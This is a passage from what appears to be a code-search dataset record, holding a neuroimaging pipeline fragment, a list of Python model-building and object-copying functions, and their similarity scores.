cutWF.connect(GADT2,'outputVolume',CreateBRAINSCutXML,'subjT2GAD')\n cutWF.connect(SGI,'outputFileName',CreateBRAINSCutXML,'subjSGGAD')\n cutWF.connect(BABC,'outputLabels',CreateBRAINSCutXML,'subjBrain')\n cutWF.connect(BFitAtlasToSubject,'outputTransform',CreateBRAINSCutXML,'atlasToSubj')\n #CreateBRAINSCutXML.inputs.atlasToSubj = \"INTERNAL_REGISTER.mat\"\n #cutWF.connect(BABC,'atlasToSubjectTransform',CreateBRAINSCutXML,'atlasToSubj')\n\n \"\"\"\n ResampleNACLabels\n \"\"\"\n ResampleAtlasNACLabels=pe.Node(interface=BRAINSResample(),name=\"ResampleAtlasNACLabels\")\n ResampleAtlasNACLabels.inputs.interpolationMode = \"NearestNeighbor\"\n ResampleAtlasNACLabels.inputs.outputVolume = \"atlasToSubjectNACLabels.nii.gz\"\n\n cutWF.connect(cutWF,'OutputSpec.atlasToSubjectTransform',ResampleAtlasNACLabels,'warpTransform')\n 
cutWF.connect(cutWF,'OutputSpec.t1_corrected',ResampleAtlasNACLabels,'referenceVolume')\n cutWF.connect(BAtlas,'template_nac_lables',ResampleAtlasNACLabels,'inputVolume')\n\n \"\"\"\n BRAINSMush\n \"\"\"\n BMUSH=pe.Node(interface=BRAINSMush(),name=\"BMUSH\")\n BMUSH.inputs.outputVolume = \"MushImage.nii.gz\"\n BMUSH.inputs.outputMask = \"MushMask.nii.gz\"\n BMUSH.inputs.lowerThresholdFactor = 1.2\n BMUSH.inputs.upperThresholdFactor = 0.55\n\n cutWF.connect(myLocalTCWF,'OutputSpec.t1_corrected',BMUSH,'inputFirstVolume')\n cutWF.connect(myLocalTCWF,'OutputSpec.t2_corrected',BMUSH,'inputSecondVolume')\n cutWF.connect(myLocalTCWF,'OutputSpec.outputLabels',BMUSH,'inputMaskVolume')\n\n \"\"\"\n BRAINSROIAuto\n \"\"\"\n BROI = pe.Node(interface=BRAINSROIAuto(), name=\"BRAINSROIAuto\")\n BROI.inputs.closingSize=12\n BROI.inputs.otsuPercentileThreshold=0.01\n BROI.inputs.thresholdCorrectionFactor=1.0\n BROI.inputs.outputROIMaskVolume = \"temproiAuto_t1_ACPC_corrected_BRAINSABC.nii.gz\"\n cutWF.connect(myLocalTCWF,'OutputSpec.t1_corrected',BROI,'inputVolume')\n\n \"\"\"\n Split the implicit outputs of BABCext\n \"\"\"\n SplitAvgBABC = pe.Node(Function(input_names=['in_files','T1_count'], output_names=['avgBABCT1','avgBABCT2'],\n function = get_first_T1_and_T2), run_without_submitting=True, name=\"99_SplitAvgBABC\")\n SplitAvgBABC.inputs.T1_count = 1 ## There is only 1 average T1 image.\n\n cutWF.connect(myLocalTCWF,'OutputSpec.outputAverageImages',SplitAvgBABC,'in_files')\n\n\n\n def printFullPath(outFileFullPath):\n print(\"=\"*80)\n print(\"=\"*80)\n print(\"=\"*80)\n print(\"=\"*80)\n print(\"{0}\".format(outFileFullPath))\n return outFileFullPath\n printOutImage = pe.Node( Function(function=printFullPath, input_names = ['outFileFullPath'], output_names = ['genoutFileFullPath']), run_without_submitting=True, name=\"99_printOutImage\")\n cutWF.connect( GADT2, 'outputVolume', printOutImage, 'outFileFullPath' )", "def compile(self):\n # create both networks\n self.q_network = self.create_model()\n # self.target_q_network = self.create_model()\n\n # set loss function in both \n adam = Adam(lr=1e-4)\n self.q_network.compile(loss=mean_huber_loss, optimizer=adam) \n # self.target_q_network.compile(loss=mean_huber_loss, optimizer=adam)\n \n # set the same weights for both initially\n # self.target_q_network.set_weights(self.q_network.get_weights())\n \n print self.q_network.summary()", "def rebuild(self):\n self.from_samples(self.samples)", "def __init__(self, inputSize, hiddenSize, outputSize, epochs = 100, debug = False):\n self.inputSize = inputSize\n self.hiddenSize = hiddenSize\n self.outputSize = outputSize\n self.epochs = epochs\n self.debug = debug\n\n #weights\n self.W1 = np.random.randn(self.inputSize, self.hiddenSize) \n self.W2 = np.random.randn(self.hiddenSize, self.outputSize)", "def copy_weights(copy_from: nn.Module, copy_to: nn.Module, polyak=None):\n if polyak is not None:\n for target_param, param in zip(copy_to.parameters(), copy_from.parameters()):\n target_param.data.copy_(polyak * param + (1 - polyak) * target_param)\n else:\n copy_to.load_state_dict(copy_from.state_dict())", "def clone(self):\n return _libsbml.Model_clone(self)", "def create_structure(self):\n\n float_type = numpy.dtype(theano.config.floatX).type\n\n layer_input = tensor.concatenate([x.output for x in self._input_layers],\n axis=2)\n # Pass rate is the probability of not dropping a unit.\n pass_rate = 1.0 - self._dropout_rate\n pass_rate = float_type(pass_rate)\n sample = 
self._network.random.uniform(size=layer_input.shape)\n mask = tensor.cast(sample < pass_rate, theano.config.floatX)\n # Multiply the output by the inverse of the pass rate before dropping\n # units to compensate the scaling effect.\n scale_correction = 1.0 / pass_rate\n scale_correction = float_type(scale_correction)\n self.output = tensor.switch(self._network.is_training,\n layer_input * scale_correction * mask,\n layer_input)", "def copy(self):\n G = WeightedGraph(self.V, self.edges.copy(), self.weights.copy())\n return G", "def __init__(self, layerNeurons, initialWeights = None, layerTypes=None, **kwargs):\r\n \r\n # Ensure that there is at-least one input and one output layer in the network\r\n assert len(layerNeurons)>1, \"At least one input layer and one output layer is needed\"\r\n \r\n # Get the total number of weights needed in the network\r\n totalWeightCount = NeuralNetwork.getSizeOfWeightVector(layerNeurons)\r\n \r\n # Initialise the weights with the initializer or random values\r\n if initialWeights is None:\r\n self.weights = np.random.uniform(-1/np.sqrt(layerNeurons[0]), 1/np.sqrt(layerNeurons[0]), totalWeightCount)\r\n else:\r\n assert len(initialWeights) == totalWeightCount, (\"Length of initial weight matrix incorrect. You need \"+str(totalWeightCount)+\" weights\")\r\n self.weights = np.array(initialWeights, dtype = np.float64) \r\n \r\n # create an empty array of layers\r\n self.layers = []\r\n layerBlockStart = 0\r\n \r\n if layerTypes is None or len(layerTypes)<(len(layerNeurons)-1):\r\n layerTypes=[NetworkLayer]*(len(layerNeurons)-1)\r\n \r\n for layerInputDimention, layerOutputDimention, layerType in zip(layerNeurons, layerNeurons[1:], layerTypes):\r\n # initialise each layer with its input and output dimentions and bi-directional pointers to the relivant weights\r\n layerBlockEnd = layerBlockStart+(layerInputDimention*layerOutputDimention)\r\n layerBiasEnd = layerBlockEnd+layerOutputDimention\r\n newLayer = layerType(layerInputDimention, layerOutputDimention, \r\n self.weights[..., layerBlockStart:layerBlockEnd], \r\n self.weights[..., layerBlockEnd:layerBiasEnd], **kwargs)\r\n self.layers.append(newLayer)\r\n \r\n layerBlockStart = layerBiasEnd\r\n \r\n # Tell the output later to use a different function to calculate the delta \r\n newLayer.calcDelta = newLayer.calcDeltaOutputLayer", "def copy(self):\n cls = self.__class__\n new_graph = cls.__new__(cls)\n new_graph._nodes = self._nodes[:]\n new_graph._node_wip = self._node_wip[:]\n new_graph._edges = self._edges[:]\n if self._sorted_nodes:\n new_graph._sorted_nodes = self._sorted_nodes[:]\n else:\n new_graph._sorted_nodes = None\n new_graph.predecessors = {}\n for key, val in self.predecessors.items():\n new_graph.predecessors[key] = self.predecessors[key][:]\n new_graph.successors = {}\n for key, val in self.successors.items():\n new_graph.successors[key] = self.successors[key][:]\n return new_graph", "def clone(self):\r\n obj = CylinderModel()\r\n obj.params = copy.deepcopy(self.params)\r\n return obj", "def copy(self):\n binCopy = Bin()\n binCopy.totalWeight = self.totalWeight\n binCopy.items = [item for item in self.items]\n return binCopy", "def copy(self):", "def copy(self, o=None):\n if o is None: o = self.__class__(self.project)\n o.scripts = [s.copy() for s in self.scripts]\n o.variables = dict((n, v.copy()) for (n, v) in self.variables.items())\n o.lists = dict((n, l.copy()) for (n, l) in self.lists.items())\n o.costumes = [c.copy() for c in self.costumes]\n o.sounds = [s.copy() for s in self.sounds]\n 
o.costume_index = self.costume_index\n o.volume = self.volume\n return o", "def build(self, input_shape):\n assert len(input_shape) == 4\n assert input_shape[1] == input_shape[2]\n self.out_channel = input_shape[3]\n # Create the weight vector\n self.W_shape = (input_shape[1], self.out_dim)\n if self.initial_weights is not None:\n self.set_weights(self.initial_weights)\n del self.initial_weights\n else:\n self.W = self.init(self.W_shape, name='{}_W'.format(self.name))\n self.trainable_weights = [self.W]\n self.built = True", "def copy_state_to_network(self):\n state = self.rigid_body_state\n\n state.position = self.transform.world_position.copy()\n state.orientation = self.transform.world_orientation.copy()\n state.angular = self.physics.world_angular.copy()\n state.velocity = self.physics.world_velocity.copy()\n # state.collision_group = self.physics.collision_group\n # state.collision_mask = self.physics.collision_mask\n self.rigid_body_time = WorldInfo.elapsed", "def test_deepcopy_not_shallow(self):\n mol_source = create_ethanol()\n mol_source.generate_conformers()\n\n mol_copy = copy.deepcopy(mol_source)\n\n assert mol_source._conformers is not mol_copy._conformers\n assert all(\n a is not b for a, b in zip(mol_source._conformers, mol_copy._conformers)\n )\n\n assert mol_source._atoms is not mol_copy._atoms\n assert all(a is not b for a, b in zip(mol_source._atoms, mol_copy._atoms))\n\n assert mol_source._bonds is not mol_copy._bonds\n assert all(a is not b for a, b in zip(mol_source._bonds, mol_copy._bonds))\n\n assert mol_source._hierarchy_schemes is not mol_copy._hierarchy_schemes\n assert all(\n a is not b\n for a, b in zip(mol_source._hierarchy_schemes, mol_copy._hierarchy_schemes)\n )\n\n assert mol_source._properties is not mol_copy._properties\n assert mol_source._partial_charges is not mol_copy._partial_charges", "def _basic_build(self, inputs_shape):\n\n d = inputs_shape[-1]\n h = self._real_units\n s = self._slots\n\n self._erase_W = self.add_variable(\n name=\"_erase_W\", shape=[d + h, h], initializer=self._kernel_initializer\n )\n self._erase_b = self.add_variable(\n name=\"_erase_b\",\n shape=[h],\n initializer=(\n self._bias_initializer\n if self._bias_initializer is not None\n else init_ops.constant_initializer(1.0, dtype=self.dtype)\n ),\n )\n\n self._reset_W = self.add_variable(\n name=\"_reset_W\", shape=[d + h, 1], initializer=self._kernel_initializer\n )\n self._reset_b = self.add_variable(\n name=\"_reset_b\",\n shape=[1],\n initializer=(\n self._bias_initializer\n if self._bias_initializer is not None\n else init_ops.constant_initializer(1.0, dtype=self.dtype)\n ),\n )\n\n self._add_W = self.add_variable(\n name=\"_add_W\", shape=[d + h, h], initializer=self._kernel_initializer\n )\n self._add_b = self.add_variable(\n name=\"_add_b\",\n shape=[h],\n initializer=(\n self._bias_initializer\n if self._bias_initializer is not None\n else init_ops.constant_initializer(1.0, dtype=self.dtype)\n ),\n )\n self.heads = self.add_variable(\n name=\"_heads\", shape=[s, d], initializer=self._kernel_initializer\n )\n\n self._beta = self.add_variable(\n name=\"_beta_no_reg\",\n shape=(),\n initializer=tf.compat.v1.constant_initializer(\n np.array([1.02]), dtype=np.float32\n ),\n )\n self._alpha = self.add_variable(\n name=\"_alpha_no_reg\",\n shape=(),\n initializer=tf.compat.v1.constant_initializer(\n np.array([0.98]), dtype=np.float32\n ),\n )", "def copy(self):\n dyn = type(self)(self._hyperparams)\n dyn.Fm = np.copy(self.Fm)\n dyn.fv = np.copy(self.fv)\n dyn.dyn_covar = 
np.copy(self.dyn_covar)\n return dyn", "def copy(self):\n dyn = type(self)(self._hyperparams)\n dyn.Fm = np.copy(self.Fm)\n dyn.fv = np.copy(self.fv)\n dyn.dyn_covar = np.copy(self.dyn_covar)\n return dyn", "def build_graph(self):\n\t\tself._create_placeholders()\n\t\tself._create_embedding()\n\t\tself._create_recurrent_layers()\n\t\tself._create_de_embedding()\n\t\tself._create_loss()\n\t\tself._create_optimizer()\n\t\tself._create_summaries()", "def _reconstruct(self, num_samples=None):", "def clone_zero(self):", "def __init__(self, inputnodes, hiddennodes, outputnodes, learningrate):\n super().__init__(inputnodes, hiddennodes, outputnodes, learningrate)\n\n # link weight matrices, wih and who\n # weights inside the arrays are w_i_j, where link is from node i to node i to j in the next layer\n # w11 w21\n # w12 w22 etc\n self.wih = cupy.random.normal(\n 0.0, pow(self.inodes, -0.5), (self.hnodes, self.inodes))\n self.who = cupy.random.normal(\n 0.0, pow(self.hnodes, -0.5), (self.onodes, self.hnodes))\n\n #activation function is the sigmoid function\n self.activation_function = lambda x: 1 / (1 + cupy.exp(x) ** (-1))", "def _clone(self, memo):\n assert self not in memo, \"the object should not have been copied twice in this pass\"\n c = Library()\n memo[self] = c\n c._netlist = None\n c._data = deepcopy(self._data)\n\n new_definitions = list()\n for definition in self._definitions:\n new_definitions.append(definition._clone(memo))\n c._definitions = new_definitions\n\n for definition in c._definitions:\n definition._library = c\n definition._clone_rip_and_replace(memo)\n return c", "def get_final_reconstruction(self):", "def copy(self):\n cpy = LsGermsStructure(self.Ls, self.germs, self.prepStrs,\n self.effectStrs, self.aliases, self.sequenceRules)\n cpy.allstrs = self.allstrs[:]\n cpy.allstrs_set = self.allstrs_set.copy()\n cpy.unindexed = self.unindexed[:]\n cpy._plaquettes = {k: v.copy() for k, v in self._plaquettes.items()}\n cpy._firsts = self._firsts[:]\n cpy._baseStrToLGerm = _copy.deepcopy(self._baseStrToLGerm.copy())\n return cpy", "def copy(self):\n node_new = Node(self.state.copy(), self.parent, self.children.copy(), self.RRT, self.path_length)\n node_new.vs = self.vs.copy()\n node_new.RRT = self.RRT\n node_new.observed = self.observed\n node_new.observation_node = self.observation_node\n node_new.observation_area = self.observation_area\n\n return node_new", "def build_model(self):\n self.g12 = G12(conv_dim=self.g_conv_dim)\n init_weights(self.g12, init_type='normal')\n self.g21 = G21(conv_dim=self.g_conv_dim)\n init_weights(self.g21, init_type='normal')\n self.d1 = D1(conv_dim=self.d_conv_dim, use_labels=self.use_labels)\n init_weights(self.d1, init_type='normal')\n self.d2 = D2(conv_dim=self.d_conv_dim, use_labels=self.use_labels)\n init_weights(self.d2, init_type='normal')\n self.dreid = DSiamese(class_count=self.num_classes_market)\n\n g_params = list(self.g12.parameters()) + list(self.g21.parameters())\n d_params = list(self.d1.parameters()) + list(self.d2.parameters())\n dr_params = list(self.dreid.parameters())\n\n self.g_optimizer = optim.Adam(g_params, self.lr, [self.beta1, self.beta2])\n self.d_optimizer = optim.Adam(d_params, self.lr, [self.beta1, self.beta2])\n self.dr_optimizer = optim.Adam(dr_params, self.lr, [self.beta1, self.beta2])\n\n if torch.cuda.is_available():\n self.g12.cuda()\n self.g21.cuda()\n self.d1.cuda()\n self.d2.cuda()\n self.dreid.cuda()", "def add_compiled_structure(self, structure):\n if self not in structure:\n structure.add_key(self, 
tf.float32)", "def _build(self, s_in: Shape, s_out: Shape) -> Shape:\n self.head_module = BasicDartsAuxHead(init_pool_stride=3)\n return self.head_module.build(s_in, s_out.num_features())", "def clone(self):\n\n copy = self.__class__(self.name, self.data)\n\n copy.set_fixed_variables_from_pdf(self)\n \n return copy", "def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):\n\n self.params = {}\n self.params['W1'] = weight_init_std * \\\n np.random.randn(input_size, hidden_size)\n self.params['b1'] = np.zeros(hidden_size)\n self.params['W2'] = weight_init_std * \\\n np.random.randn(hidden_size, output_size)\n self.params['b2'] = np.zeros(output_size)", "def copy_me(self):\n signature = inspect.getfullargspec(OutputSettings.__init__)[0]\n settings = OutputSettings()\n for attr in signature:\n if hasattr(self.output_settings, attr):\n setattr(settings, attr, getattr(self.output_settings, attr))\n settings.initialize_log_file()\n\n # create new Hyperpipe instance\n pipe_copy = Hyperpipe(\n name=self.name,\n inner_cv=deepcopy(self.cross_validation.inner_cv),\n outer_cv=deepcopy(self.cross_validation.outer_cv),\n best_config_metric=self.optimization.best_config_metric,\n metrics=self.optimization.metrics,\n optimizer=self.optimization.optimizer_input_str,\n optimizer_params=self.optimization.optimizer_params,\n output_settings=settings,\n )\n\n signature = inspect.getfullargspec(self.__init__)[0]\n for attr in signature:\n if hasattr(self, attr) and attr != \"output_settings\":\n setattr(pipe_copy, attr, getattr(self, attr))\n\n if hasattr(self, \"preprocessing\") and self.preprocessing:\n preprocessing = Preprocessing()\n for element in self.preprocessing.elements:\n preprocessing += element.copy_me()\n pipe_copy += preprocessing\n if hasattr(self, \"elements\"):\n for element in self.elements:\n pipe_copy += element.copy_me()\n return pipe_copy", "def clone_rand(self):", "def __init__(self, inputSize, outputSize, hiddenSize): \n\n self.inputSize = inputSize\n self.outputSize = outputSize\n self.hiddenSize = hiddenSize \n \n # Initialize random weight with range [-0.5, 0.5]\n self.weight = np.matrix(np.random.uniform(-0.5, 0.5, (self.hiddenSize, self.inputSize)))\n\n # Initialize random bias with range [0, 1]\n self.bias = np.matrix(np.random.uniform(0, 1, (1, self.hiddenSize)))\n \n self.H = 0\n self.beta = 0", "def __init__(self, inputnodes, hiddennodes, outputnodes, learningrate):\n \n super().__init__(inputnodes, hiddennodes, outputnodes, learningrate)\n\n # link weight matrices, wih and who\n # weights inside the arrays are w_i_j, where link is from node i to node i to j in the next layer\n # w11 w21\n # w12 w22 etc\n self.wih = numpy.random.normal(\n 0.0, pow(self.inodes, -0.5), (self.hnodes, self.inodes))\n self.who = numpy.random.normal(\n 0.0, pow(self.hnodes, -0.5), (self.onodes, self.hnodes))\n\n #activation function is the sigmoid function\n self.activation_function = lambda x: scipy.special.expit(x)\n\n pass", "def _build(self, s_in: Shape, s_out: Shape) -> Shape:\n self.head_module = BasicDartsAuxHead(init_pool_stride=2)\n return self.head_module.build(s_in, s_out.num_features())", "def clones(module, num_copies):\n return nn.ModuleList([copy.deepcopy(module) for _ in range(num_copies)])", "def __init__(self, netSize):\n\t\t\n\t\t# TRY THIS FOR RANDOM!\n\t\t#\n\t\t#\n\t\t#\n\t\t\n\t\tself.biases = [self.randomArray(i, 1) for i in netSize[1:]] # Biases do not exist for the first layer ! 
Those are inputs.\n\t\tself.netSize = netSize\n\t\t#Initialize Weights\n\t\t#This initializes the weights for each layer based on the size. The number of rows should be\n\t\t#the number of neurons for the current, and the number of columns should be the same as the number of neurons\n\t\t#in the next layer. There are no weights for the last layer. That's the output layer.\n\t\tself.weights \t\t = [self.randomArray(i, j) for i, j in zip(netSize[:-1], netSize[1:]) ]", "def __init__(self, in_features, out_features):\n \n ########################\n # PUT YOUR CODE HERE #\n #######################\n\n\n self.params = {'weight': 0.0001 * np.random.randn(out_features, in_features), 'bias': np.zeros((out_features, 1))}\n self.grads = {'weight': np.zeros((out_features, in_features)), 'bias': np.zeros((out_features, 1))}\n\n\n\n ########################\n # END OF YOUR CODE #\n #######################", "def compile_frozen_graph(self):\n pass", "def build_model():", "def build_model(self):\n for link in self.links:\n # if from neuron is input to graph, add it to input_neurons set\n if self.is_input_neuron(link.from_neuron_id):\n self.input_neurons.add(link.from_neuron_id)\n # add weight to neuron\n if link.to_neuron_id not in self.weights:\n self.weights[link.to_neuron_id] = []\n self.weights[link.to_neuron_id].append(link.weight)\n # add input to neuron\n if link.to_neuron_id not in self.connections:\n self.connections[link.to_neuron_id] = []\n self.connections[link.to_neuron_id].append(link.from_neuron_id)", "def build_layer(self) :\n inputsWithBias = self.input_count + 1\n self.weights = np.random.rand(inputsWithBias, self.node_count)\n self.weights_and_activations = (self.weights, self.activations)", "def deepcopy(D):\n D_copy = python_copy.deepcopy(D)\n D_copy.uid = Device._next_uid\n Device._next_uid += 1\n D_copy.name = D.name\n # Make sure _bb_valid is set to false for these new objects so new\n # bounding boxes are created in the cache\n for D in D_copy.get_dependencies(True):\n D._bb_valid = False\n D_copy._bb_valid = False\n\n return D_copy" ]
[ "0.64318305", "0.6379705", "0.6327976", "0.6265465", "0.6256646", "0.62523013", "0.61420536", "0.6140329", "0.613779", "0.61183465", "0.6103677", "0.6048058", "0.603064", "0.6028374", "0.60247666", "0.5962394", "0.5946479", "0.5925313", "0.590854", "0.5892423", "0.58535075", "0.58485365", "0.58153343", "0.578531", "0.5712303", "0.5709148", "0.5702827", "0.5700456", "0.5681707", "0.5677498", "0.56746936", "0.566185", "0.56482846", "0.5643006", "0.56197107", "0.56105244", "0.55867076", "0.5586644", "0.5562775", "0.55617195", "0.5560223", "0.55515635", "0.55493855", "0.5546479", "0.5538619", "0.5524977", "0.55159354", "0.5500507", "0.5490974", "0.5486679", "0.54717505", "0.5457607", "0.5457452", "0.5455699", "0.54553044", "0.545204", "0.5445465", "0.5435786", "0.54294205", "0.5425673", "0.5424056", "0.54209507", "0.54205316", "0.54195166", "0.54078424", "0.54040176", "0.53993016", "0.5397613", "0.53967273", "0.539157", "0.5390917", "0.53899854", "0.5383179", "0.5365998", "0.5365998", "0.5364521", "0.5360515", "0.53587717", "0.5345411", "0.5345407", "0.5339917", "0.5334387", "0.53255725", "0.5324529", "0.5324469", "0.5324327", "0.53192526", "0.53185767", "0.53172135", "0.5317109", "0.53114444", "0.5311341", "0.5306311", "0.5303181", "0.5302377", "0.5300252", "0.52966803", "0.5289496", "0.5287764", "0.52873456", "0.52863395" ]
0.0
-1
Predict movement of game controller where there is epsilon probability of a random move.
def eps_greedy_action(self, phi, tabu):
        # increase counter of actions taken
        self.a_count += 1
        # if within the initial buffer before learning starts, random action
        aval_actions = None
        if self.a_count < self.warmup:
            if len(tabu) > 0:
                # Remove tabu actions from list of available actions
                aval_actions = [a for a in self.actions if a not in tabu]
            action = self.random_action(aval_actions)
            return action, None
        elif (self.a_count == self.warmup) and self.verbose:
            print('learning starts')

        # evaluate Q(phi, a) for each action
        qvalues = self.Qmodel.predict(phi, batch_size=1)[0]

        # generate random value
        randn = np.random.uniform()

        # eliminate tabu values from possible actions to pick
        aval_actions = None
        if len(tabu) > 0:
            if randn < self.epsilon:
                aval_actions = [a for a in self.actions if a not in tabu]
            else:
                # Update Qs to low values to ensure they are not picked
                tabu_idx = [i for i in range(self.num_actions) if self.actions[i] in tabu]
                qvalues[tabu_idx] = -9999

        # eps-greedy, select random action
        if randn < self.epsilon:
            action = self.random_action(aval_actions)
            a_i = self.action_str2idx(action)
        else:
            # select best action
            a_i = np.argmax(qvalues)
            action = self.actions[a_i]

        # update greedy parameter and action count
        self.epsilon *= self.discount_epsilon
        self.a_count += 1

        return action, qvalues[a_i]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def predict_movement(self, data, epsilon):\n\n q_actions = self.model.predict(data, batch_size = 1)\n opt_policy = np.argmax(q_actions)\n rand_val = np.random.random()\n if rand_val < epsilon:\n opt_policy = np.random.randint(0, NUM_ACTIONS)\n return opt_policy, q_actions[0, opt_policy]", "def predict_movement(self, data, epsilon):\r\n q_actions = self.model.predict(\r\n data.reshape(1, 84, 84, NUM_FRAMES), batch_size=1)\r\n opt_policy = np.argmax(q_actions)\r\n rand_val = np.random.random()\r\n if rand_val < epsilon:\r\n opt_policy = np.random.randint(0, NUM_ACTIONS)\r\n return opt_policy, q_actions[0, opt_policy]", "def __random_movement(self):\n\t\tself.__steps += 1 \t\t# Increment after every frame\n\t\t# When __steps greater than threshold reverse the direction\n\t\t# and set threshold to a new random value\n\t\tif self.__steps >= self.__threshold_steps:\t\n\t\t\tif self.direction == 'RIGHT':\n\t\t\t\tself.move_left()\n\t\t\t\tself.direction = 'LEFT'\n\t\t\telse:\n\t\t\t\tself.move_right()\n\t\t\t\tself.direction = 'RIGHT'\n\t\t\tself.__threshold_steps = random.randint(25,50)\n\t\t\tself.__steps = 0\n\t\t# Confines the Donkeys movement to within the boundary \n\t\tself.__check_boundary()", "def after_move(self):\n self.epsilon -= self.epsilon_decay_rate\n self.epsilon = max(self.epsilon, self.epsilon_min)", "def action(self, observation, epsilon=0):\n if epsilon and epsilon>np.random.rand():\n return np.random.randint(self.action_shape)\n activations = super().predict(observation.observation)\n return np.argmax(activations)", "def update_parameter(self):\n\n if self.testing: # 1. No random choice when testing\n self.epsilon = 0\n else: # 2. Update parameters when learning\n if self.epsilon > 0.:\n self.epsilon -= 0.01\n\n return self.epsilon", "def determine_move_position(self):\n green_probs = []\n net_size = len(self.net)\n adjacents = self.net[self.current_pos].adjacents\n #Belief propagation:\n #Analyzes each position's probability of obtaining\n #green when measuring at a time t+1.\n for i in adjacents:\n accum = 0\n for j in range(0, net_size):\n distance = self.__get_distance(i-1, j)\n if distance == 0: #Probability of measure green at distance 0 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[0][0]\n elif distance == 1: #Probability of measure green at distance 1 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[1][0]\n elif distance == 2: #Probability of measure green at distance 2 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[2][0]\n elif distance == 3: #Probability of measure green at distance 3 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[3][0]\n else: #Probability of measure green at a distance >= 4 from 'i'.\n accum += self.enemy_net[i-1].value * self.ct[4][0]\n green_probs.append((i, accum))\n #Returns the position in which the probability of\n #obtaining green when measuring is the lowest.\n return min(green_probs, key=itemgetter(1))[0]", "def reward(self) -> float:\n return random.random() * 2 if self.cur_pos >= self.end_pos else -0.1", "def move(probability, motion, p_move):\n y, x = motion\n return p_move * (np.roll(np.roll(probability, x, axis=1), y, axis=0)) + (1. 
- p_move) * probability", "def epsilon_greedy_move(self):\n\n # get the current state\n state, _ = self.board.bit_board_representation()\n \n # choose the move to play\n is_exploring_move = False\n if random.random() < self.epsilon:\n # exploration\n action = self.board.random_move()\n is_exploring_move = True\n else:\n # exploitation\n action, _ = self.board.greedy_action_move(self.target_network)\n\n action_index = action\n if self.board.player == CONST.BLACK:\n action_index = action + 9\n \n # play the epsilon greedy move\n self.board.play_move(action)\n \n # add the experience to the experience buffer if the move was not an exploration move\n if not is_exploring_move:\n reward = self.board.reward()\n not_terminal = self.board.not_terminal_int()\n succ_state, succ_player = self.board.bit_board_representation()\n succ_legal_moves = self.board.legal_moves\n self.experience_buffer.add(state, action_index, reward, not_terminal, succ_state, succ_player, succ_legal_moves)", "def predict(self) :\n y_pred = np.dot(self.W.T,self.X_test) + self.b \n if self.thr!=-1 :\n y_pred[y_pred <= self.thr] = -1\n y_pred[y_pred > self.thr] = 1\n y_pred = y_pred.astype(\"int\")\n corr = 0\n for i in range(y_pred.shape[1]) :\n if y_pred[:,i]==self.y_test[:,i] :\n corr += 1\n accu = (corr / y_pred.shape[1])*100\n print(\"ACCURACY : {}\".format(accu))\n else :\n rmse = np.sqrt(np.sum(np.square(self.y_test - y_pred)) / y_pred.shape[1])\n print(\"RMSE : {}\".format(rmse))", "def act(self, observation):\n if np.random.random() >= self.epsilon:\n return np.argmax(self.expvalue)\n else:\n return np.random.randint(0, 9)", "def act(self, a_state):\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.n_actions)\n else:\n action_values = self.model.predict(a_state)\n\n return np.argmax(action_values[0])", "def act(self, observation):\n if np.random.random() < self.epsilon:\n return np.random.randint(0,9)\n else:\n return np.argmax(self.values)", "def act(self, observation):\n if np.random.random() < self.epsilon:\n return np.random.randint(0,9)\n else:\n return np.argmax(self.values)", "def _epsilon_greedy(self, info_state, legal_actions, epsilon):\n probs = np.zeros(self._num_actions)\n if np.random.rand() < epsilon:\n action = np.random.choice(legal_actions)\n probs[legal_actions] = 1.0 / len(legal_actions)\n else:\n info_state = np.reshape(info_state, [1, -1])\n q_values = self._session.run(\n self._q_values, feed_dict={self._info_state_ph: info_state})[0]\n legal_q_values = q_values[legal_actions]\n action = legal_actions[np.argmax(legal_q_values)]\n probs[action] = 1.0\n return action, probs", "def act(self, state):\n # Random\n if np.random.rand() <= self.epsilon:\n return self.environment.action_space.sample()\n\n # Model prediction\n return np.argmax(self.model.predict(state)[0])", "def predict(self):\n\n\t\t# Gets odometry for current move (velocity of robot and rotational velocity or robot)\n\t\tself.robot.get_odometry()\n\n\t\t# Updates matricies A, G, P\n\t\tself.robot.update_prediction_matrices()\n\t\t\n\t\t# Predicts position based on old position and odometry readings that are input into the system model\n\t\tself.robot.position = self.robot.position + self.robot.process_model\n\n\t\t# Creates Prediction Propogation matrix\n\t\tself.robot.P = np.dot(self.robot.A, np.dot(self.robot.P, self.robot.A.T)) + np.dot(self.robot.G, np.dot(self.robot.Q, self.robot.G.T))", "def predict(self, state):\n if self.phase is None or self.device is None:\n raise AttributeError('Phase, device attributes have 
to be set!')\n if self.phase == 'train' and self.epsilon is None:\n raise AttributeError('Epsilon attribute has to be set in training phase')\n\n if self.reach_destination(state):\n return ActionXY(0, 0) if self.kinematics == 'holonomic' else ActionRot(0, 0)\n if self.action_space is None:\n self.build_action_space(state.robot_state.v_pref)\n\n probability = np.random.random()\n if self.phase == 'train' and probability < self.epsilon:\n max_action = self.action_space[np.random.choice(len(self.action_space))]\n else:\n max_action = None\n max_value = float('-inf')\n max_traj = None\n\n if self.do_action_clip:\n state_tensor = state.to_tensor(add_batch_size=True, device=self.device)\n action_space_clipped = self.action_clip(state_tensor, self.action_space, self.planning_width)\n else:\n action_space_clipped = self.action_space\n\n for action in action_space_clipped:\n state_tensor = state.to_tensor(add_batch_size=True, device=self.device)\n next_state = self.state_predictor(state_tensor, action)\n max_next_return, max_next_traj = self.V_planning(next_state, self.planning_depth, self.planning_width)\n reward_est = self.estimate_reward(state, action)\n value = reward_est + self.get_normalized_gamma() * max_next_return\n if value > max_value:\n max_value = value\n max_action = action\n max_traj = [(state_tensor, action, reward_est)] + max_next_traj\n if max_action is None:\n raise ValueError('Value network is not well trained.')\n\n if self.phase == 'train':\n self.last_state = self.transform(state)\n else:\n self.traj = max_traj\n\n return max_action", "def play_epsilon_greedy_policy(self, board):\n policy = np.random.choice(['random', 'q_agent'], 1, p=[self.epsilon, 1-self.epsilon])[0]\n if policy == 'random':\n move, _ = RandomAgent.play(board)\n else:\n move, q_value = self.play(board)\n self.after_move()\n return move, policy", "def get_move_predictions(model, legal_moves, session):\n sessions, prob_dict = open_prediction_tree(legal_moves, session)\n inputs = np.zeros((len(sessions), INPUT_SIZE))\n win_status = np.zeros(len(sessions))\n for j, sess in enumerate(sessions):\n inputs[j,:] = session_to_input(sess)\n win_status[j] = 